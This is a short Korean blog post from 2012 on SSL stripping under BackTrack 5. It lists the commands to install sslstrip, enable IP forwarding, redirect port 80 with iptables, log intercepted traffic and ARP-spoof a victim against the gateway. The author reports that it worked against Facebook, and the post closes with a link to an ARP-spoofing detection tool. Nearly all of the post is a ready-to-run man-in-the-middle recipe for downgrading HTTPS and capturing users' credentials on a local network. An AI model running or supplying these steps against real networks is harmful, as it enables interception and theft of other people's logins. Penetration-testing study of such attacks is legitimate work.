tool & libs & OpenSource

[BackTrack5] backtrack 5에서의 SSL Spoofing

파이s 2012. 7. 19. 17:18

이래서 backtrack이 좋다고 하나 봅니다.

그러나 본인이 요구하는 소기의 목적은 달성하지 못했네요..ㅠ_ㅠ

해서...그냥 정리겸....

< install >

# cd /pentest/web/sslstrip
(README 문서가 있기는 하나, 보기 싫은 사람을 위해 명령어 위주로 정리해 봄, 참고로 root 권한으로 수행하기를 권고)

# sudo apt-get install python-twisted-web

# python setup.py install

# python sslstrip.py -h


< run >

# echo "1" > /proc/sys/net/ipv4/ip_forward

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 (ex port : 1000)

# sslstrip -p -l 1000 (ex port : 1000)

# tail -f sslstrip.log  <-- spoofing 기록이 log에 남겨짐

# arpspoof -i eth1 -t (victim ip) (gateway ip )



...facebook은 잘 떠지네...ㅋㅋ

만든 사람의 UI 사상이 이해가 가지 않는다는 cain 도 써보고...이런저런 local proxy 도 써보고 했으나....

왜 안되는 걸까...쩝



PS) 참고로 방어 방법은 이 사이트 참고

http://secu153.tistory.com/entry/ARP-Spoofing-%EA%B0%90%EC%A7%80-Tool-Xarp

 

xarp-2.1.1-win.zip

 readme.zip

 

 

저작자표시 비영리 변경금지

'tool & libs & OpenSource' 카테고리의 다른 글

packet replay tool (windows)  (0) 2012.11.14
admin page finder + wan ip  (0) 2012.08.08
Hash Table DOS Test tools  (0) 2012.06.13
IPTIME Ralink SoftAP 사용  (0) 2012.06.11
[FireFox-addon] Tamper Data  (0) 2012.06.11

'tool & libs & OpenSource'의 다른글

  • 현재글[BackTrack5] backtrack 5에서의 SSL Spoofing

관련글

티스토리툴바